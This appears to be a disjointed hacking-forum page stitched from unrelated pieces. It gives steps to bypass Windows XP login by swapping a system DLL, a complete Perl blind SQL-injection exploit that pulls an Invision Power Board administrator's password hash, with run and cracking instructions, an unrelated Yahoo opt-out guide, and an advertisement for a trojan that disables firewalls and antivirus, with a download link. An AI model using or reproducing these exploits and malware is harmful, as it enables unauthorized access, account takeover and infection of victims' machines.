There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.
Steps to Hack into a Windows XP Computer without changing password:
1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL HERE.
3. Unzip the downloaded dreampackpl.zip and you'll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press "R" to install DreamPackPL.
7. Press "C" to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is "1" if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:
"ren C:WindowsSystem32sfcfiles.dll sfcfiles.lld" (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:
"copy D:i386pinball.ex_ C:WindowsSystem32sfcfiles.dll" (without quotes and assuming your CD drive is D:)
11. Type "exit", take out disk and reboot.
12. In the password field, type "dreamon" (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and enable the options and enable the god command.
15. Type "god" in the password field to get in Windows.
You can also go to Passwords and select "Logon with wrong password and hash". This option allows you to login with ANY password.
HACKING FORUM
Hacking Forums
#!/usr/bin/perl -w
##################################################################
# This expoit works fine. Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "Hacker"
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print "..By Hacker. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].
";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current
";
last;
}
}
if ( length($outputs) < 1 ) { print "Not Exploitable!
"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;
# Hacker
http://shorl.com/gakadupofugo
#Now u hv perl installed in ur system. Open your Notepad -> copy the above perl script and paste it there -> save it as ipb.pl
#Now go to C:perlin and paste your ipb.pl file there.
#Now u r almost done.
#Open your Command prompt(start->run->cmd->hit enter)
#Now change your directory to perl by typing cd C:Perlin in ur command prompt
#Now u r in perl's bin directory. Now all u need to do is to access the ipb.pl file that u saved in bin directory
#For this type the command : -perl ipb.pl
#Now your exploit is executed. Let's celebrate
Now it's time to tell u how to use it.
#I think u guys remember that u r hacking site User ID "3" who is the administrator of site "http://www.xxxxxxxx.com"
#Go to your command prompt (run->cmd) and type this into ur command prompt : -
ipb.pl http://www.xxxxxxxx.com/ 3 1
#It may takes some time as the exploit gathers the information and grab the "hash"
#Don't close the programme if it takes some time bcz this is the finalisation phase which gives u the way to access the forum with admin privilages.
#Once the hash grabbing is complete, u r returned with full hash and UserID
#Now once u got the hash For e.g 8476t3f6534ty3bt6k6g6f4fj3jb1h0m
#Don't confuse with these numbers, it's useless unless u know how to use it.
#This is nothing but the admin's password encrypted by using theMD5 hash algorithm
#I think most of u heard that MD5 hash is impossible to crack. MD5s are impossible to reverse "once a string is MD5ed, there is no way to get it back to plain-text"
#It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash (as i already cracked MD5 hash, so it's not impossible)
#You can use any method, and any crackers to crack this hash
#Once you r done i.e u hv cracked the hash, you will be given a plain-text password (which is your gateway to enter the forum)
To disable Yahoo from Tracking you
- 1) Go to the address http://privacy.yahoo.com/privacy & click the "Cookies" link under the "Special Topics" column.
2) Click the "Web Beacons" link under the "Reference Links" Column.
3) On this page, click the "click here to opt out" link toward the end of the third paragraph under the "Outside the Yahoo! Network" title.
4) After a while, a page that says you have been out of the monitoring program will load. Without doing anything, close that page or continue your usual urfing by typing another address in the address bar. (Do NOT click the "Cancel Opt-out" button, your action will be cancelled!).
5) You're done! Now Yahoo! will not record what you're doing during surfing.
Note : How Innocent it may appear but its Voilation of yahoo Policies.
The punisher TORJAN
Antivirus Version Update Result
AhnLab-V3 2007.6.20.1 06.20.2007 no virus found
AntiVir 7.4.0.34 06.20.2007 no virus found
Authentium 4.93.8 06.19.2007 no virus found
Avast 4.7.997.0 06.20.2007 no virus found
AVG 7.5.0.467 06.19.2007 no virus found
BitDefender 7.2 06.20.2007 Generic.Malware.SDbTk.997E24F1
CAT-QuickHeal 9.00 06.19.2007 no virus found
ClamAV devel-20070416 06.20.2007 no virus found
DrWeb 4.33 06.20.2007 WIN.SCRIPT.Virus
eSafe 7.0.15.0 06.19.2007 no virus found
eTrust-Vet 30.7.3727 06.19.2007 no virus found
Ewido 4.0 06.20.2007 no virus found
FileAdvisor 1 06.20.2007 no virus found
Fortinet 2.91.0.0 06.20.2007 no virus found
F-Prot 4.3.2.48 06.19.2007 no virus found
F-Secure 6.70.13030.0 06.20.2007 Backdoor.Win32.VB.gen
Ikarus T3.1.1.8 06.20.2007 no virus found
Kaspersky 4.0.2.24 06.20.2007 Backdoor.Win32.VB.gen
McAfee.19.2007 VB-BackDoor.a.gen
Mcft 1.2607 06.20.2007 no virus found
NOD32v2.20.2007 probably unknown NewHeur_PE virus
Norman 5.80.02 06.20.2007 no virus found
Panda 9.0.0.4 06.20.2007 no virus found
Prevx1 V2 06.20.2007 no virus found
Sophos 4.18.0 06.12.2007 Mal/VB-F
Sunbelt 2.2.907.0 06.09.2007 no virus found
Symantec 10 06.20.2007 no virus found
TheHacker 6.1.6.136 06.20.2007 no virus found
VBA32 3.12.0.2 06.20.2007 no virus found
VirusBuster 4.3.23:9 06.19.2007 no virus found
Webwasher-Gateway 6.0.1 06.20.2007 no virus found
When the victim open server.exe this will close automatically windows firewall ,nod32 ,sygate firewall ,disable task manager
Server copy: C:\WINDOWS\system32\Svchost32.exe
Trojan Name: The Punisher Trojan
Server size:294 KB
Client Size:1,45 MB
Coded In : Visual Basic
Author: Hackers University
the link is.....
http://rapidshare.com/files/38467233/The_P...Trojan.rar.html